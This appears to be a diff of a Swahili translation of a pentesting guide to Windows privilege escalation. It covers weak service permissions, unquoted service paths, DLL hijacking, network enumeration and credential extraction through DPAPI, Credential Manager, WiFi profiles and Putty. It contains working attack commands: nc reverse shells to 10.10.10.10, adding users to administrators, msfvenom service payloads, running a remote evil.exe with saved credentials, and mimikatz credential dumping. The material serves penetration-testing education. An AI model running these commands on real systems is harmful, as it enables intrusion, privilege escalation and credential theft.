Support" (Windows + F1), tafuta "command prompt", bonyeza "Click to open Command Prompt" -## Services +## Huduma Pata orodha ya huduma: ```bash @@ -431,46 +434,46 @@ wmic service list brief sc query Get-Service ``` -### Permissions +### Ruhusa Unaweza kutumia **sc** kupata taarifa za huduma ```bash sc qc ``` -Inashauriwa kuwa na binary **accesschk** kutoka _Sysinternals_ ili kuangalia kiwango cha ruhusa kinachohitajika kwa kila huduma. +Inashauriwa kuwa na binary **accesschk** kutoka kwa _Sysinternals_ ili kuangalia ngazi ya ruhusa inayohitajika kwa kila huduma. ```bash accesschk.exe -ucqv #Check rights for different groups ``` -Inashauriwa kuangalia kama "Authenticated Users" wanaweza kubadilisha huduma yoyote: +Inashauriwa kuangalia ikiwa "Authenticated Users" wanaweza kubadilisha huduma yoyote: ```bash accesschk.exe -uwcqv "Authenticated Users" * /accepteula accesschk.exe -uwcqv %USERNAME% * /accepteula accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version ``` -[Unaweza kupakua accesschk.exe kwa XP hapa](https://github.com/ankh2054/windows-pentest/raw/master/Privelege/accesschk-2003-xp.exe) +[You can download accesschk.exe for XP for here](https://github.com/ankh2054/windows-pentest/raw/master/Privelege/accesschk-2003-xp.exe) ### Wezesha huduma -Ikiwa unapata kosa hili (kwa mfano na SSDPSRV): +Ikiwa unapata hitilafu hii (kwa mfano na SSDPSRV): -_Kosa la mfumo 1058 limetokea._\ -_Huduma haiwezi kuanzishwa, ama kwa sababu imezimwa au kwa sababu haina vifaa vilivyowezeshwa vinavyohusishwa nayo._ +_System error 1058 has occurred._\ +_The service cannot be started, either because it is disabled or because it has no enabled devices associated with it._ -Unaweza kuifanya iweze kutumia +Unaweza kuiwezesha kwa kutumia ```bash sc config SSDPSRV start= demand sc config SSDPSRV obj= ".\LocalSystem" password= "" ``` -**Chukua katika akaunti kwamba huduma upnphost inategemea SSDPSRV ili kufanya kazi (kwa XP SP1)** +**Kumbuka kwamba huduma upnphost inategemea SSDPSRV ili ifanye kazi (kwa XP SP1)** -**Njia nyingine ya kutatua** tatizo hili ni kukimbia: +**Suluhisho mbadala** kwa tatizo hili ni kuendesha: ``` sc.exe config usosvc start= auto ``` -### **Badilisha njia ya binary ya huduma** +### **Modify service binary path** -Katika hali ambapo kundi la "Watumiaji walioidhinishwa" lina **SERVICE_ALL_ACCESS** kwenye huduma, mabadiliko ya binary ya kutekeleza ya huduma yanawezekana. Ili kubadilisha na kutekeleza **sc**: +Katika tukio ambapo kundi "Authenticated users" linamiliki **SERVICE_ALL_ACCESS** kwa service, inawezekana kubadilisha executable binary ya service. Ili kubadilisha na kuendesha **sc**: ```bash sc config binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe" sc config binpath= "net localgroup administrators username /add" @@ -478,25 +481,25 @@ sc config binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cm sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe" ``` -### Anzisha huduma +### Anzisha upya huduma ```bash wmic service NAMEOFSERVICE call startservice net stop [service name] && net start [service name] ``` -Privileges zinaweza kupandishwa kupitia ruhusa mbalimbali: +Kupandishwa kwa ruhusa (privilege escalation) kunaweza kutokea kupitia ruhusa zifuatazo: -- **SERVICE_CHANGE_CONFIG**: Inaruhusu kubadilisha usanidi wa binary ya huduma. -- **WRITE_DAC**: Inaruhusu kubadilisha ruhusa, na hivyo kuweza kubadilisha usanidi wa huduma. +- **SERVICE_CHANGE_CONFIG**: Inaruhusu kusanidi tena binary ya service. +- **WRITE_DAC**: Inaruhusu kubadilisha ruhusa, ikiongoza kwa uwezo wa kubadilisha usanidi wa service. - **WRITE_OWNER**: Inaruhusu kupata umiliki na kubadilisha ruhusa. -- **GENERIC_WRITE**: Inarithi uwezo wa kubadilisha usanidi wa huduma. -- **GENERIC_ALL**: Pia inarithi uwezo wa kubadilisha usanidi wa huduma. +- **GENERIC_WRITE**: Inajumuisha uwezo wa kubadilisha usanidi wa service. +- **GENERIC_ALL**: Pia inajumuisha uwezo wa kubadilisha usanidi wa service. -Kwa ajili ya kugundua na kutumia udhaifu huu, _exploit/windows/local/service_permissions_ inaweza kutumika. +Kwa kugundua na kutumia udhaifu huu, _exploit/windows/local/service_permissions_ inaweza kutumika. -### Ruhusa dhaifu za binaries za huduma +### Ruhusa dhaifu kwa binaries za huduma -**Angalia kama unaweza kubadilisha binary inayotekelezwa na huduma** au kama una **ruhusa za kuandika kwenye folda** ambapo binary inapatikana ([**DLL Hijacking**](dll-hijacking/index.html))**.**\ -Unaweza kupata kila binary inayotekelezwa na huduma kwa kutumia **wmic** (sio katika system32) na kuangalia ruhusa zako kwa kutumia **icacls**: +**Angalia kama unaweza kubadilisha binary inayotekelezwa na huduma** au kama una **ruhusa za kuandika kwenye folda** ambapo binary iko ([**DLL Hijacking**](dll-hijacking/index.html))**.**\ +Unaweza kupata kila binary inayotekelezwa na huduma kwa kutumia **wmic** (sio kwenye system32) na kukagua ruhusa zako kwa kutumia **icacls**: ```bash for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt @@ -508,10 +511,10 @@ sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt ``` -### Services registry modify permissions +### Idhini za kubadilisha rejista ya huduma -Unapaswa kuangalia kama unaweza kubadilisha ruhusa za huduma yoyote ya rejista.\ -Unaweza **kuangalia** ruhusa zako juu ya **rejista** ya huduma kwa kufanya: +Unapaswa kuangalia kama unaweza kubadilisha rejista yoyote ya huduma.\ +Unaweza **kuangalia** **idhini** zako juu ya **rejista** ya huduma kwa kufanya: ```bash reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services @@ -520,32 +523,31 @@ for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\ get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i " Users Path Everyone" ``` -Inapaswa kuangaliwa ikiwa **Authenticated Users** au **NT AUTHORITY\INTERACTIVE** wana ruhusa za `FullControl`. Ikiwa ndivyo, faili ya binary inayotekelezwa na huduma inaweza kubadilishwa. +Inapaswa kukaguliwa ikiwa **Authenticated Users** au **NT AUTHORITY\INTERACTIVE** wanamiliki ruhusa za `FullControl`. Ikiwa ndivyo, binary inayotekelezwa na huduma inaweza kubadilishwa. -Ili kubadilisha Njia ya faili ya binary inayotekelezwa: +Ili kubadilisha Path ya binary inayotekelezwa: ```bash reg add HKLM\SYSTEM\CurrentControlSet\services\ /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f ``` -### Huduma za rejista Ruhusa za AppendData/AddSubdirectory - -Ikiwa una ruhusa hii juu ya rejista hii inamaanisha **unaweza kuunda sub registries kutoka hii**. Katika kesi ya huduma za Windows hii ni **ya kutosha kutekeleza msimbo wowote:** +### Services registry AppendData/AddSubdirectory permissions +Ikiwa una ruhusa hii juu ya registry, hii inamaanisha kwamba **unaweza kuunda sub registries kutoka hii**. Katika kesi ya Windows services hili ni **la kutosha kutekeleza arbitrary code:** {{#ref}} appenddata-addsubdirectory-permission-over-service-registry.md {{#endref}} -### Njia za Huduma zisizo na Nukuu +### Unquoted Service Paths -Ikiwa njia ya executable haiko ndani ya nukuu, Windows itajaribu kutekeleza kila kitu kinachomalizika kabla ya nafasi. +Ikiwa path ya executable haiko ndani ya nukuu, Windows itajaribu kutekeleza kila sehemu kabla ya nafasi. -Kwa mfano, kwa njia _C:\Program Files\Some Folder\Service.exe_ Windows itajaribu kutekeleza: +Kwa mfano, kwa path _C:\Program Files\Some Folder\Service.exe_ Windows itajaribu kutekeleza: ```bash C:\Program.exe C:\Program Files\Some.exe C:\Program Files\Some Folder\Service.exe ``` -Orodha ya njia za huduma zisizo na nukuu, ukiondoa zile zinazomilikiwa na huduma za Windows zilizojengwa ndani: +Orodhesha njia zote za huduma zisizokuwa zimewekwa kwa nukuu, ukiacha zile za huduma za Windows zilizojengwa: ```bash wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v '\"' wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v '\"' # Not only auto services @@ -565,19 +567,19 @@ echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && ```bash gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name ``` -**Unaweza kugundua na kutumia** udhaifu huu kwa kutumia metasploit: `exploit/windows/local/trusted\_service\_path` Unaweza kuunda binary ya huduma kwa mikono kwa kutumia metasploit: +Unaweza kugundua na kutumia udhaifu huu kwa metasploit: `exploit/windows/local/trusted\_service\_path` Unaweza kuunda service binary kwa mikono ukitumia metasploit: ```bash msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe ``` -### Hatua za Kuokoa +### Hatua za Urejeshaji -Windows inaruhusu watumiaji kubaini hatua zitakazochukuliwa ikiwa huduma itashindwa. Kipengele hiki kinaweza kuwekewa mipangilio ili kuelekeza kwenye binary. Ikiwa binary hii inaweza kubadilishwa, kupandisha hadhi kunaweza kuwa na uwezekano. Maelezo zaidi yanaweza kupatikana katika [nyaraka rasmi](). +Windows inaruhusu watumiaji kubainisha vitendo vinavyopaswa kuchukuliwa ikiwa huduma itashindwa. Kipengele hiki kinaweza kusanidiwa kuonyesha binary. Ikiwa binary hii inaweza kubadilishwa, privilege escalation inaweza kuwa inawezekana. Maelezo zaidi yanaweza kupatikana katika [official documentation](). -## Maombi +## Programu -### Maombi Yaliyosakinishwa +### Programu zilizowekwa -Angalia **idhini za binaries** (labda unaweza kuandika moja na kupandisha hadhi) na za **folders** ([DLL Hijacking](dll-hijacking/index.html)). +Angalia **permissions of the binaries** (labda unaweza overwrite moja na kupata privilege escalation) na za **folders** ([DLL Hijacking](dll-hijacking/index.html)). ```bash dir /a "C:\Program Files" dir /a "C:\Program Files (x86)" @@ -588,9 +590,9 @@ Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name ``` ### Ruhusa za Kuandika -Angalia kama unaweza kubadilisha faili fulani ya usanidi ili kusoma faili maalum au ikiwa unaweza kubadilisha faili fulani ambayo itatekelezwa na akaunti ya Msimamizi (schedtasks). +Angalia ikiwa unaweza kuhariri baadhi ya config file ili kusoma faili maalum, au ikiwa unaweza kuhariri binary itakayotekelezwa na Administrator account (schedtasks). -Njia moja ya kupata ruhusa dhaifu za folda/faili katika mfumo ni kufanya: +Njia ya kutafuta ruhusa dhaifu za folda/faili katika mfumo ni kufanya: ```bash accesschk.exe /accepteula # Find all weak folder permissions per drive. @@ -613,40 +615,49 @@ Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Ac Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}} ``` -### Run at startup +### Endeshwa wakati wa kuanza + +**Angalia ikiwa unaweza kuandika upya baadhi ya registry au binary ambayo itatekelezwa na mtumiaji tofauti.**\ +**Soma** **ukurasa ufuatao** ili ujifunze zaidi kuhusu maeneo ya **autoruns** yanayovutia kwa ajili ya **escalate privileges**: -**Angalia kama unaweza kubadilisha baadhi ya registry au binary ambayo itatekelezwa na mtumiaji tofauti.**\ -**Soma** **ukurasa ufuatao** kujifunza zaidi kuhusu maeneo ya **autoruns ya kuvutia ili kupandisha mamlaka**: {{#ref}} privilege-escalation-with-autorun-binaries.md {{#endref}} -### Drivers +### Madereva -Tafuta madereva ya **third party ya ajabu/yenye udhaifu**. +Tafuta madereva ya **wadau wa tatu** yanayoweza kuwa **yasiyo ya kawaida au yenye udhaifu** ```bash driverquery driverquery.exe /fo table driverquery /SI ``` +Kama driver inatoa arbitrary kernel read/write primitive (common katika IOCTL handlers zilizobuniwa vibaya), unaweza escalate kwa kuiba SYSTEM token moja kwa moja kutoka kernel memory. Angalia mbinu hatua‑kwa‑hatua hapa: + +{{#ref}} +arbitrary-kernel-rw-token-theft.md +{{#endref}} + + ## PATH DLL Hijacking -Ikiwa una **idhini za kuandika ndani ya folda iliyopo kwenye PATH** unaweza kuwa na uwezo wa kuingilia DLL inayopakuliwa na mchakato na **kuinua mamlaka**. +Ikiwa una **write permissions inside a folder present on PATH**, unaweza hijack a DLL loaded by a process na hivyo **escalate privileges**. -Angalia idhini za folda zote ndani ya PATH: +Kagua ruhusa za folda zote ndani ya PATH: ```bash for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. ) ``` -Kwa maelezo zaidi kuhusu jinsi ya kutumia udhibiti huu: +Kwa maelezo zaidi kuhusu jinsi ya kutumia vibaya ukaguzi huu: + {{#ref}} dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md {{#endref}} -## Mtandao +## Network -### Kushiriki +### Shares ```bash net view #Get a list of computers net view /all /domain [domainname] #Shares on the domains @@ -656,23 +667,23 @@ net share #Check current shares ``` ### hosts file -Angalia kompyuta nyingine zinazojulikana zilizowekwa kwa nguvu kwenye faili la hosts +Angalia kompyuta nyingine zinazojulikana zilizowekwa hardcoded kwenye hosts file ``` type C:\Windows\System32\drivers\etc\hosts ``` -### Interfaces za Mtandao & DNS +### Violesura vya Mtandao & DNS ``` ipconfig /all Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address Get-DnsClientServerAddress -AddressFamily IPv4 | ft ``` -### Open Ports +### Bandari Zilizofunguliwa -Angalia **huduma zilizozuiliwa** kutoka nje +Angalia kwa **huduma zilizozuiliwa** kutoka nje ```bash netstat -ano #Opened ports? ``` -### Jedwali la Mwelekeo +### Jedwali la Routing ``` route print Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex @@ -684,27 +695,27 @@ Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L ``` ### Firewall Rules -[**Angalia ukurasa huu kwa amri zinazohusiana na Firewall**](../basic-cmd-for-pentesters.md#firewall) **(orodhesha sheria, tengeneza sheria, zima, zima...)** +[**Check this page for Firewall related commands**](../basic-cmd-for-pentesters.md#firewall) **(orodhesha sheria, unda sheria, zima, zima...)** -Zaidi[ amri za kuhesabu mtandao hapa](../basic-cmd-for-pentesters.md#network) +Zaidi[ commands for network enumeration here](../basic-cmd-for-pentesters.md#network) ### Windows Subsystem for Linux (wsl) ```bash C:\Windows\System32\bash.exe C:\Windows\System32\wsl.exe ``` -Binary `bash.exe` inaweza pia kupatikana katika `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe` +Binary `bash.exe` pia inaweza kupatikana katika `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe` -Ikiwa unapata mtumiaji wa root unaweza kusikiliza kwenye bandari yoyote (wakati wa kwanza unapotumia `nc.exe` kusikiliza kwenye bandari itakuuliza kupitia GUI ikiwa `nc` inapaswa kuruhusiwa na firewall). +Ikiwa unapata root user unaweza kusikiliza kwenye bandari yoyote (mara ya kwanza unapotumia `nc.exe` kusikiliza kwenye bandari itakuuliza kupitia GUI kama `nc` inapaswa kuruhusiwa na firewall). ```bash wsl whoami ./ubuntun1604.exe config --default-user root wsl whoami wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE' ``` -Ili kuanza bash kama root kwa urahisi, unaweza kujaribu `--default-user root` +Ili kuanzisha bash kama root kwa urahisi, unaweza kujaribu `--default-user root` -Unaweza kuchunguza mfumo wa faili wa `WSL` katika folda `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\` +Unaweza kuchunguza mfumo wa faili wa `WSL` kwenye folda `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\` ## Windows Credentials @@ -723,13 +734,13 @@ reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDef ### Credentials manager / Windows vault From [https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault](https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault)\ -Windows Vault inahifadhi akauti za mtumiaji kwa seva, tovuti na programu nyingine ambazo **Windows** inaweza **kuingia kwa watumiaji kiotomatiki**. Katika hali ya kwanza, hii inaweza kuonekana kama sasa watumiaji wanaweza kuhifadhi akauti zao za Facebook, akauti za Twitter, akauti za Gmail n.k., ili waingie kiotomatiki kupitia vivinjari. Lakini si hivyo. +The Windows Vault inahifadhi nywila za watumiaji za seva, tovuti na programu nyingine ambazo **Windows** inaweza **log in the users automaticall**y. Kwa mtazamo wa kwanza, inaweza kuonekana kama watumiaji wanaweza kuhifadhi Facebook credentials, Twitter credentials, Gmail credentials n.k., ili wawe wanaingia moja kwa moja kupitia vivinjari. Lakini si hivyo. -Windows Vault inahifadhi akauti ambazo Windows inaweza kuingia kwa watumiaji kiotomatiki, ambayo inamaanisha kwamba **programu yoyote ya Windows inayohitaji akauti ili kufikia rasilimali** (seva au tovuti) **inaweza kutumia Credential Manager** & Windows Vault na kutumia akauti zilizotolewa badala ya watumiaji kuingiza jina la mtumiaji na nenosiri kila wakati. +Windows Vault inahifadhi nywila ambazo Windows inaweza kuingia watumiaji kwa njia ya moja kwa moja, ambayo ina maana kuwa programu yoyote **Windows application that needs credentials to access a resource** (server or a website) **can make use of this Credential Manager** & Windows Vault na kutumia nywila zilizotolewa badala ya watumiaji kuingiza jina la mtumiaji na nenosiri kila wakati. -Ila programu zinaposhirikiana na Credential Manager, sidhani kama inawezekana kwao kutumia akauti za rasilimali fulani. Hivyo, ikiwa programu yako inataka kutumia vault, inapaswa kwa namna fulani **kuwasiliana na meneja wa akauti na kuomba akauti za rasilimali hiyo** kutoka kwenye vault ya uhifadhi wa kawaida. +Isipokuwa programu zinashirikiana na Credential Manager, sidhani kuwa zinaweza kutumia nywila za rasilimali fulani. Kwa hivyo, ikiwa programu yako inataka kutumia vault, inapaswa kwa njia fulani **communicate with the credential manager and request the credentials for that resource** kutoka kwenye default storage vault. -Tumia `cmdkey` kuorodhesha akauti zilizohifadhiwa kwenye mashine. +Tumia `cmdkey` kuorodhesha nywila zilizohifadhiwa kwenye mashine. ```bash cmdkey /list Currently stored credentials: @@ -737,38 +748,38 @@ Target: Domain:interactive=WORKGROUP\Administrator Type: Domain Password User: WORKGROUP\Administrator ``` -Kisha unaweza kutumia `runas` na chaguo la `/savecred` ili kutumia akiba ya taarifa za kuingia. Mfano ufuatao unaita binary ya mbali kupitia sehemu ya SMB. +Kisha unaweza kutumia `runas` kwa chaguo la `/savecred` ili kutumia saved credentials. Mfano ufuatao unaita remote binary kupitia SMB share. ```bash runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" ``` -Kutumia `runas` na seti ya akidi zilizotolewa. +Kutumia `runas` na seti ya vitambulisho vilivyotolewa. ```bash C:\Windows\System32\runas.exe /env /noprofile /user: "c:\users\Public\nc.exe -nc 4444 -e cmd.exe" ``` -Note that mimikatz, lazagne, [credentialfileview](https://www.nirsoft.net/utils/credentials_file_view.html), [VaultPasswordView](https://www.nirsoft.net/utils/vault_password_view.html), or from [Empire Powershells module](https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/dumpCredStore.ps1). +Kumbuka kwamba mimikatz, lazagne, [credentialfileview](https://www.nirsoft.net/utils/credentials_file_view.html), [VaultPasswordView](https://www.nirsoft.net/utils/vault_password_view.html), au kutoka [Empire Powershells module](https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/dumpCredStore.ps1). ### DPAPI -**Data Protection API (DPAPI)** inatoa njia ya usimbaji wa data wa simetriki, hasa inayotumika ndani ya mfumo wa uendeshaji wa Windows kwa usimbaji wa funguo za kibinafsi zisizo za simetriki. Usimbaji huu unatumia siri ya mtumiaji au mfumo kuchangia kwa kiasi kikubwa katika entropy. +The **Data Protection API (DPAPI)** provides a method for symmetric encryption of data, predominantly used within the Windows operating system for the symmetric encryption of asymmetric private keys. This encryption leverages a user or system secret to significantly contribute to entropy. -**DPAPI inaruhusu usimbaji wa funguo kupitia funguo za simetriki ambazo zinatokana na siri za kuingia za mtumiaji**. Katika hali zinazohusisha usimbaji wa mfumo, inatumia siri za uthibitishaji wa kikoa cha mfumo. +**DPAPI enables the encryption of keys through a symmetric key that is derived from the user's login secrets**. In scenarios involving system encryption, it utilizes the system's domain authentication secrets. -Funguo za RSA za mtumiaji zilizohifadhiwa, kwa kutumia DPAPI, zinahifadhiwa katika saraka ya `%APPDATA%\Microsoft\Protect\{SID}`, ambapo `{SID}` inawakilisha [Identifier ya Usalama](https://en.wikipedia.org/wiki/Security_Identifier) wa mtumiaji. **Funguo ya DPAPI, iliyoko pamoja na funguo kuu inayolinda funguo za kibinafsi za mtumiaji katika faili hiyo hiyo**, kwa kawaida ina bytes 64 za data za nasibu. (Ni muhimu kutambua kwamba ufikiaji wa saraka hii umewekwa vizuizi, kuzuia orodha ya yaliyomo kupitia amri ya `dir` katika CMD, ingawa inaweza kuorodheshwa kupitia PowerShell). +Funguo za RSA za mtumiaji zilizofichwa kwa kutumia DPAPI zinawekwa katika saraka `%APPDATA%\Microsoft\Protect\{SID}`, ambapo `{SID}` inawakilisha [Security Identifier](https://en.wikipedia.org/wiki/Security_Identifier). **Funguo ya DPAPI, iliyoko pamoja na master key inayolinda funguo za kibinafsi za mtumiaji katika faili sawa**, kwa kawaida inajumuisha data ya nasibu ya bytes 64. (Ni muhimu kutambua kuwa ufikiaji wa saraka hii umewekewa mipaka, ukizuia kuorodhesha yaliyomo kwa kutumia amri ya `dir` katika CMD, ingawa inaweza kuorodheshwa kupitia PowerShell). ```bash Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\ Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect\ ``` -Unaweza kutumia **mimikatz module** `dpapi::masterkey` na hoja sahihi (`/pvk` au `/rpc`) ili kuifungua. +Unaweza kutumia **mimikatz module** `dpapi::masterkey` na vigezo vinavyofaa (`/pvk` au `/rpc`) kuibomoa usimbaji. -Faili za **akisi zilizolindwa na nenosiri kuu** kwa kawaida zinapatikana katika: +The **credentials files protected by the master password** are usually located in: ```bash dir C:\Users\username\AppData\Local\Microsoft\Credentials\ dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\ Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\ Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\ ``` -Unaweza kutumia **mimikatz module** `dpapi::cred` pamoja na `/masterkey` inayofaa ili kufungua.\ -Unaweza **kuchota DPAPI nyingi** **masterkeys** kutoka **kumbukumbu** kwa kutumia `sekurlsa::dpapi` module (ikiwa wewe ni root). +Unaweza kutumia **mimikatz module** `dpapi::cred` na `/masterkey` inayofaa ili decrypt.\ +Unaweza **extract many DPAPI** **masterkeys** kutoka **memory** kwa kutumia module `sekurlsa::dpapi` (ikiwa wewe ni root). {{#ref}} dpapi-extracting-passwords.md @@ -776,9 +787,9 @@ dpapi-extracting-passwords.md ### PowerShell Credentials -**PowerShell credentials** mara nyingi hutumiwa kwa ajili ya **scripting** na kazi za automatisering kama njia ya kuhifadhi akiba za siri zilizofichwa kwa urahisi. Akiba hizo zinalindwa kwa kutumia **DPAPI**, ambayo kwa kawaida inamaanisha zinaweza kufunguliwa tu na mtumiaji yule yule kwenye kompyuta ile ile zilipoundwa. +**PowerShell credentials** mara nyingi hutumika kwa ajili ya **scripting** na kazi za automation kama njia ya kuhifadhi credentials zilizofichwa kwa urahisi. Credentials hizi zinalindwa kwa kutumia **DPAPI**, ambayo kwa kawaida inamaanisha zinaweza tu decrypted na mtumiaji huyo kwenye kompyuta ile ile zilipofanywa. -Ili **kufungua** akiba ya PS kutoka kwenye faili inayoiweka unaweza kufanya: +Ili **decrypt** PS credentials kutoka kwenye faili inayoihifadhi, unaweza kufanya: ```bash PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml' PS C:\> $credential.GetNetworkCredential().username @@ -798,34 +809,34 @@ netsh wlan show profile key=clear #Oneliner to extract all wifi passwords cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on* ``` -### Saved RDP Connections +### Muunganisho za RDP Zilizohifadhiwa Unaweza kuzipata kwenye `HKEY_USERS\\Software\Microsoft\Terminal Server Client\Servers\`\ na katika `HKCU\Software\Microsoft\Terminal Server Client\Servers\` -### Recently Run Commands +### Amri zilizotekelezwa hivi karibuni ``` HCU\\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU HKCU\\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU ``` -### **Meneja ya Akiba ya Kitambulisho cha Desktop ya Kijijini** +### **Meneja wa Nyaraka za Kuingia za Remote Desktop** ``` %localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings ``` -Tumia moduli ya **Mimikatz** `dpapi::rdg` pamoja na `/masterkey` inayofaa ili **kufungua faili zozote za .rdg**\ -Unaweza **kuchota masterkeys nyingi za DPAPI** kutoka kwenye kumbukumbu kwa kutumia moduli ya Mimikatz `sekurlsa::dpapi` +Tumia **Mimikatz** `dpapi::rdg` module na `/masterkey` inayofaa ili **ku-decrypt any .rdg files**\ +Unaweza **extract many DPAPI masterkeys** kutoka memory kwa moduli ya Mimikatz `sekurlsa::dpapi` module ### Sticky Notes -Watu mara nyingi hutumia programu ya StickyNotes kwenye vituo vya kazi vya Windows kuhifadhi **nywila** na taarifa nyingine, bila kujua ni faili ya database. Faili hii iko katika `C:\Users\\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite` na daima inafaa kutafutwa na kuchunguzwa. +Watu mara nyingi hutumia app ya StickyNotes kwenye Windows workstations kuhifadhi **passwords** na taarifa nyingine, bila kutambua kuwa ni faili ya database. Faili hii iko kwenye `C:\Users\\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite` na daima inastahili kutafutwa na kuchunguzwa. ### AppCmd.exe -**Kumbuka kwamba ili kurejesha nywila kutoka AppCmd.exe unahitaji kuwa Administrator na kuendesha chini ya kiwango cha Juu cha Uaminifu.**\ -**AppCmd.exe** iko katika saraka ya `%systemroot%\system32\inetsrv\` .\ -Ikiwa faili hii ipo basi inawezekana kwamba baadhi ya **akidi** zimewekwa na zinaweza **kurejeshwa**. +**Kumbuka kwamba ili recover passwords kutoka AppCmd.exe unahitaji kuwa Administrator na kuendesha kwa ngazi ya High Integrity.**\ +**AppCmd.exe** iko katika `%systemroot%\system32\inetsrv\` directory.\ +Ikiwa faili hii ipo basi inawezekana kwamba baadhi ya **credentials** zimetangazwa na zinaweza **kupatikana**. -Huu ni msimbo uliochukuliwa kutoka [**PowerUP**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1): +Msimbo huu umetolewa kutoka [**PowerUP**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1): ```bash function Get-ApplicationHost { $OrigError = $ErrorActionPreference @@ -905,40 +916,40 @@ $ErrorActionPreference = $OrigError ``` ### SCClient / SCCM -Angalia kama `C:\Windows\CCM\SCClient.exe` ipo.\ -Wakati wa kufunga **hufanywa kwa haki za SYSTEM**, nyingi zina udhaifu wa **DLL Sideloading (Taarifa kutoka** [**https://github.com/enjoiz/Privesc**](https://github.com/enjoiz/Privesc)**).** +Angalia kama `C:\Windows\CCM\SCClient.exe` ipo .\ +Wasakinishaji **huendeshwa kwa ruhusa za SYSTEM**, wengi wao wako hatarini kwa **DLL Sideloading (Taarifa kutoka** [**https://github.com/enjoiz/Privesc**](https://github.com/enjoiz/Privesc)**).** ```bash $result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion if ($result) { $result } else { Write "Not Installed." } ``` -## Faili na Usajili (Akida) +## Mafaili na Registry (Credentials) -### Akida za Putty +### Putty Creds ```bash reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there ``` -### Funguo za Mhost za Putty SSH +### Putty SSH Host Keys ``` reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\ ``` -### SSH keys in registry +### SSH keys katika rejista -SSH private keys zinaweza kuhifadhiwa ndani ya funguo za registry `HKCU\Software\OpenSSH\Agent\Keys` hivyo unapaswa kuangalia kama kuna kitu chochote cha kuvutia huko: +Funguo binafsi za SSH zinaweza kuhifadhiwa ndani ya funguo la rejista `HKCU\Software\OpenSSH\Agent\Keys`, hivyo unapaswa kukagua kama kuna kitu chochote cha kuvutia hapo: ```bash 